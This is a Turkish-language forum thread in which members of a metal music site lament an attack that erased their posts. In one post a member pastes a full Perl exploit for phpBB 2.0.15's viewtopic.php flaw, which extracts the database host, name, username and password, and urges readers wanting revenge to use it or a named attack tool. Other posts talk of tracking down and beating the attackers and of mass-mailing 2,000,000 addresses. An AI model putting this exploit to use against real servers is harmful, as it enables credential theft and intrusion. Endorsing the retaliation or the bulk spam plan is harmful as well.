Saldırı
Sitemizi çekemeyenler hala saldırı yapıyorlar.Bu seferde mesajları silmişler.Sanırım en iyi forumuz ve çekemiyorlar.... BAŞKA BİRŞEY DEMEK İSTEMİYORUM.

önlemimizi almışmıydık????

olcak iş deil..yeni albumler eklicem ama onlarda silinmesin ..

exploit işte nolacak başkalarının yazdığı kodlarla saldırıyorlar. olay şu anladığım kadarıyla adam adminlerden birinin kullanıcı adı ve şifresin ibulup yönetim panelinden temizlik yapıyor. merak edenler ve intikam almak istiyenler aşağıdaki kodu kullansın. yada www.tahribat.com DENYO LAUNCER programını indirip saldırsın. #!/usr/bin/perl # ************************************************** ************ #** #** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability #** This exploit gives the user all the details about the database #** connection such as database host, username, password and #** database name. #** #** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 #** #** Greetings to GvR, Jumento, PP, CKrew & friends #** # ************************************************** ************ use IO::Socket; print "+-----------------------------------------------------------------------+\r\n"; print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n"; print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n"; print "+-----------------------------------------------------------------------+\r\n"; if (@ARGV < 3) { print "Usage:\r\n"; print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n"; print "SERVER - Server where PhpBB is installed.\r\n"; print "DIR - PHPBB directory or / for no directory.\r\n"; print "THREADID - Id of an existing thread.\r\n"; print "COOKIESTRING - Optional, cookie string of the http request.\r\n"; print " Use this when a thread needs authentication for viewing\r\n"; print " You can use Firefox in combination with \"Live HTTP\r\n"; print " Headers\" to get this cookiestring.\r\n\r\n"; print "Example 1 (with cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \" phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22 autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22 userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n"; print "Example 2 (without cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n"; exit(); } $serv = $ARGV<0>; $dir = $ARGV<1>; $threadid = $ARGV<2>; $cookie = $ARGV<3>; $serv =~ s/http:\/\///ge; $delimit = "GvRSecureD"; $sploit = $dir . "viewtopic.php?t="; $sploit .= $threadid; $sploit .= "&highlight='.printf($delimit."; $sploit .= "\$dbhost."; $sploit .= "$delimit."; $sploit .= "\$dbname."; $sploit .= "$delimit."; $sploit .= "\$dbuser."; $sploit .= "$delimit."; $sploit .= "\$dbpasswd."; $sploit .= "$delimit).'"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "<+> Connecting ... Could not connect to host.\n\n"; print "<+> Connecting OK\n"; sleep(1); print "<+> Sending exploit "; print $sock "GET $sploit HTTP/1.1\r\n"; print $sock "Host: $serv\r\n"; if ( defined $cookie) { print $sock "Cookie: $cookie \r\n"; } print $sock "Connection: close\r\n\r\n"; $succes = 0; while ($answer = <$sock>) { $delimitIndex = index $answer, $delimit; if ($delimitIndex >= 0) { $succes = 1; $urlIndex = index $answer, "href"; if ($urlIndex < 0){ $answer = substr($answer, length($delimit)); $length = 0; while (length($answer) > 0) { $nex = index($answer, $delimit); if ($nex > 0) { push(@array, substr($answer, 0, $nex)); $answer = substr($answer, $nex + length($delimit), length($answer)); } else { $answer= ""; } } } } } close($sock); if ($succes == 1) { print "OK\n"; sleep(1); print "<+> Database Host: " . $array<0> . "\n"; sleep(1); print "<+> Database Name: " . $array<1> . "\n"; sleep(1); print "<+> Username: " . $array<2> . "\n"; sleep(1); print "<+> Password: " . $array<3> . "\n"; sleep(1); } else { print "FAILED\n"; }

arkadaşlar tekrar geçmiş olsun ama insan emeğine saygısı olmayan bu "insanlara (!)" karşı bi önlem alamıyomuyuz acaba. yani bi hafta sonra tekrar bunun olabilme ihtimali varsa çok kötü.

ya bişeyi merak ettim sitenin kopyasını kendimiz alamazmıyız pcmize...yani illaki sağlayıcımızın alması mı lazım???

hocam kim saldırıyo anlamadım ayrıca arson verdiğin koddları ne yapacağız

bu şekilde bi önlem alınmadan siteyi doldurmaya devam etmek sinirlerimizi bozmaktan başka bi işe yaramaz...ayrıca madem adminlerden birinin hesabına girdiler IPleri orda yazar sanırım...bu adamları bulamazmıyız..böle karşı saldırıyla olmaz medeniyetin sınırı buraya kadar bu adamları dövmek lazım artık.

Bunu yapan adamlar için söylenecek pek çok söz var... ama forum ahlakı açısından söylenmez şimdi burda..

BUNU YAPANI BİR YAKALASAM.... SANIRIM BU İŞ FREE SERVERLARLA OLMAYACAK .... OTURUP ADAM GİBİ KARAR VERMEK LAZIM...

Ewt legba ya para bulup siteyi alıcaz.yada olmayatacak böyle. Olaya neredeyse canlı tanığım.onlinedım.kapadım siteyi.5 dakka içinde darkdreamed msnde site niye açılmıyor dedi.Baktım hemen siteye girince site kapalıdır uyarısı veriyor.Yönetim panelinden açtm hemen.Siteyi kapat seçilmiş.Açtım baktım mesajlar yok.Açıkçası bir şekil bulamazsak ben zaten forum olayını bırakıyorum.günlerdir hepimizin verdiği emekler 2 dakika içinde göz göre gidince sinir bir hayli taşıyor.Bence artık rapçi saldırı falanda değil bu.Rakipler bile olabilir.Çünkü ötekiler açık hiç kapanmadı.Sadece saldırı yapıldı onlara ama dikakt ederseniz hala aynı şekilde devam edyorlar.Bence bizim başarımızı çekemiyorlar.İnsanın aklına herşey geliyor.Napalım bulucaz inşallah bir çaresini...

evet iki kıçıkırık rapçinin bunları yapabilmesi bana da mucizevi geliyor...özellikle metaltr admininin verdiği cevaptan sonra benimde aklıma bazı ihtimaller gelmeye başladı!!!!neyi paylaşamıyoruz anlamış değilim.

Başarıyı dostum başarıyı bence.Başka metal forum sitelerinde adminlerin yaptığı açıklamalar benide kötü düşüncelere itti baya.Eğer saldırı olmasaydı en yakın zamanda en iyi siteler den biri olacaktık.Bu şekil başka bir site gösterseize bana.Online metal radyosu olan.Bu şekil metal müziğe benzeyen.Bütün arama motorlarına ekleme yapmıştım msiteyi , aysıca paylaşım linklerine de...Elimde 2.000.000 mail ve bunları göndericek programım mevcuttu .daha bugün buldum.Sitein reklamı açısından 2.000.000 kişiye aynı anda sitemizi tanıtacaktım.Sadece bu kadar değil daha bir çok şey yapacaktım gerek reklam olsun , gerek dizayn olsun.Ama artık ne zevkim nede şevkim kaldı bunları yapmak için... Ve dediğim gibi rapçi olduğunu hiç sanmıyorum bu iblislerin. Aslında rahatlama başlığı açim bir tane..Oraya girip bu deyyuslara istediğiniz küfürü aklınızdan geçenleri yazın.:) Ayrıca nightmareforum@yahoo.com adresine herkes mail göndersin.bütün üyeler yarın öbürgün site hiç açılmazsa gene ve biz daha güvenli yeni bir site yapmak zorunda kalırsak oradan hepinize ulaşalım... Bkarsınız yarın lastviking gibi offline olur burasıda..